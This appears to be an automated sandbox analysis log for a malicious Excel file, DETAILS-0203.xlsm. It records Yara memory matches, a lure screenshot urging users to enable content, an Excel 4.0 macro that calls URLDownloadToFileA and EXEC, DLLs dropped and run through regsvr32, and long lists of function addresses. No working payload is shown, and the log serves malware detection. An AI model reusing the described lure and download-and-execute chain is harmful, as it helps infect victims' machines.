Source: Yara match	File source: 8.2.regsvr32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.regsvr32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.620000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.982437930.0000000000770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.776100426.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.762582363.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.727092920.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.755941529.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.776041513.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.787004594.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.786980121.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.708112308.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.982478205.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.740360397.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.721082289.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.749819742.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.769378943.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.707785239.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.715213011.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.756084497.00000000002E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.769479040.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.733570022.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 8	Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Source: Screenshot number: 12	Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 12	Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

Found malicious Excel 4.0 Macro

Source: DETAILS-0203.xlsm	Macro extractor: Sheet: EFALGV contains: URLDownloadToFileA
Source: DETAILS-0203.xlsm	Macro extractor: Sheet: EFALGV contains: urlmon

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\sei.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll			Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: DETAILS-0203.xlsm	Initial sample: EXEC
Source: DETAILS-0203.xlsm	Initial sample: EXEC

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Uxnbokktp\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1004B05E	4_2_1004B05E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1004F336	4_2_1004F336
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1004B46A	4_2_1004B46A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1006D66D	4_2_1006D66D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1005D847	4_2_1005D847
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1004B88A	4_2_1004B88A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1006B89B	4_2_1006B89B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1005D95D	4_2_1005D95D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1006BDC4	4_2_1006BDC4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10052171	4_2_10052171
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100481E0	4_2_100481E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1006C306	4_2_1006C306
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1006036A	4_2_1006036A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10068426	4_2_10068426
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001643C	4_2_1001643C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10070446	4_2_10070446
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BBE09	6_2_002BBE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C0418	6_2_002C0418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CEAA3	6_2_002CEAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B6CBB	6_2_002B6CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B66B0	6_2_002B66B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BB4FC	6_2_002BB4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D110E	6_2_002D110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B4700	6_2_002B4700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B3511	6_2_002B3511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CD14C	6_2_002CD14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BD346	6_2_002BD346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BE1A9	6_2_002BE1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C09F9	6_2_002C09F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C63F0	6_2_002C63F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C1FD0	6_2_002C1FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BF1D5	6_2_002BF1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C882F	6_2_002C882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BF43B	6_2_002BF43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BB200	6_2_002BB200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D1E19	6_2_002D1E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BA01C	6_2_002BA01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CB215	6_2_002CB215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B9617	6_2_002B9617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CDE11	6_2_002CDE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CE612	6_2_002CE612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D0E6D	6_2_002D0E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D086F	6_2_002D086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CF060	6_2_002CF060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B1865	6_2_002B1865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C0C7C	6_2_002C0C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B2279	6_2_002B2279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B8C7C	6_2_002B8C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B4E77	6_2_002B4E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C7473	6_2_002C7473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CF24C	6_2_002CF24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D225A	6_2_002D225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B3C51	6_2_002B3C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C16AD	6_2_002C16AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CA4B5	6_2_002CA4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CD6B1	6_2_002CD6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B508B	6_2_002B508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B6A8D	6_2_002B6A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CB687	6_2_002CB687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B5C9A	6_2_002B5C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BD899	6_2_002BD899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CEC9B	6_2_002CEC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C5497	6_2_002C5497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C0097	6_2_002C0097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D1AE9	6_2_002D1AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B88E5	6_2_002B88E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B18F6	6_2_002B18F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CBAF2	6_2_002CBAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B72CC	6_2_002B72CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C3CDD	6_2_002C3CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BCED8	6_2_002BCED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CDAD8	6_2_002CDAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C112D	6_2_002C112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C692B	6_2_002C692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BBB23	6_2_002BBB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B9133	6_2_002B9133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CC535	6_2_002CC535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B1930	6_2_002B1930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B3F09	6_2_002B3F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B1B09	6_2_002B1B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C5D68	6_2_002C5D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CC16B	6_2_002CC16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BE379	6_2_002BE379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C0F7A	6_2_002C0F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B4342	6_2_002B4342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BDB59	6_2_002BDB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C95A8	6_2_002C95A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C1DA6	6_2_002C1DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CAFB0	6_2_002CAFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B4BB4	6_2_002B4BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CE18B	6_2_002CE18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CB384	6_2_002CB384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C9184	6_2_002C9184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B9B80	6_2_002B9B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B7786	6_2_002B7786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BF784	6_2_002BF784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B7599	6_2_002B7599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002B5995	6_2_002B5995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C51E8	6_2_002C51E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D13FD	6_2_002D13FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D03F2	6_2_002D03F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C41CF	6_2_002C41CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002D27DF	6_2_002D27DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002BC7D1	6_2_002BC7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002C47D2	6_2_002C47D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E0418	7_2_003E0418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DBE09	7_2_003DBE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D6CBB	7_2_003D6CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D66B0	7_2_003D66B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EEAA3	7_2_003EEAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DB4FC	7_2_003DB4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D3511	7_2_003D3511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F110E	7_2_003F110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D4700	7_2_003D4700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003ED14C	7_2_003ED14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DD346	7_2_003DD346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DE1A9	7_2_003DE1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E09F9	7_2_003E09F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E63F0	7_2_003E63F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DF1D5	7_2_003DF1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E1FD0	7_2_003E1FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DF43B	7_2_003DF43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E882F	7_2_003E882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DA01C	7_2_003DA01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F1E19	7_2_003F1E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D9617	7_2_003D9617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EB215	7_2_003EB215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EE612	7_2_003EE612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EDE11	7_2_003EDE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DB200	7_2_003DB200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D8C7C	7_2_003D8C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E0C7C	7_2_003E0C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D2279	7_2_003D2279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D4E77	7_2_003D4E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E7473	7_2_003E7473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F086F	7_2_003F086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F0E6D	7_2_003F0E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D1865	7_2_003D1865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EF060	7_2_003EF060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F225A	7_2_003F225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D3C51	7_2_003D3C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EF24C	7_2_003EF24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EA4B5	7_2_003EA4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003ED6B1	7_2_003ED6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E16AD	7_2_003E16AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DD899	7_2_003DD899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EEC9B	7_2_003EEC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D5C9A	7_2_003D5C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E5497	7_2_003E5497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E0097	7_2_003E0097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D6A8D	7_2_003D6A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D508B	7_2_003D508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EB687	7_2_003EB687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D18F6	7_2_003D18F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EBAF2	7_2_003EBAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F1AE9	7_2_003F1AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D88E5	7_2_003D88E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E3CDD	7_2_003E3CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DCED8	7_2_003DCED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EDAD8	7_2_003EDAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D72CC	7_2_003D72CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EC535	7_2_003EC535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D1930	7_2_003D1930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D9133	7_2_003D9133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E112D	7_2_003E112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E692B	7_2_003E692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DBB23	7_2_003DBB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D3F09	7_2_003D3F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D1B09	7_2_003D1B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E0F7A	7_2_003E0F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DE379	7_2_003DE379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EC16B	7_2_003EC16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E5D68	7_2_003E5D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DDB59	7_2_003DDB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D4342	7_2_003D4342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D4BB4	7_2_003D4BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EAFB0	7_2_003EAFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E95A8	7_2_003E95A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E1DA6	7_2_003E1DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D7599	7_2_003D7599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D5995	7_2_003D5995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EE18B	7_2_003EE18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DF784	7_2_003DF784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EB384	7_2_003EB384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E9184	7_2_003E9184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D7786	7_2_003D7786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003D9B80	7_2_003D9B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F13FD	7_2_003F13FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F03F2	7_2_003F03F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E51E8	7_2_003E51E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003F27DF	7_2_003F27DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E47D2	7_2_003E47D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003DC7D1	7_2_003DC7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003E41CF	7_2_003E41CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0029110E	8_2_0029110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028882F	8_2_0028882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027F43B	8_2_0027F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027B200	8_2_0027B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027BE09	8_2_0027BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00279617	8_2_00279617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00291E19	8_2_00291E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00280418	8_2_00280418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028DE11	8_2_0028DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028E612	8_2_0028E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027A01C	8_2_0027A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028B215	8_2_0028B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00271865	8_2_00271865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00290E6D	8_2_00290E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028F060	8_2_0028F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00274E77	8_2_00274E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00280C7C	8_2_00280C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00278C7C	8_2_00278C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028F24C	8_2_0028F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0029225A	8_2_0029225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00273C51	8_2_00273C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002816AD	8_2_002816AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028EAA3	8_2_0028EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002766B0	8_2_002766B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028D6B1	8_2_0028D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028A4B5	8_2_0028A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00276A8D	8_2_00276A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027508B	8_2_0027508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028B687	8_2_0028B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028EC9B	8_2_0028EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00275C9A	8_2_00275C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027D899	8_2_0027D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00285497	8_2_00285497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00280097	8_2_00280097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00291AE9	8_2_00291AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002788E5	8_2_002788E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002718F6	8_2_002718F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028BAF2	8_2_0028BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027B4FC	8_2_0027B4FC
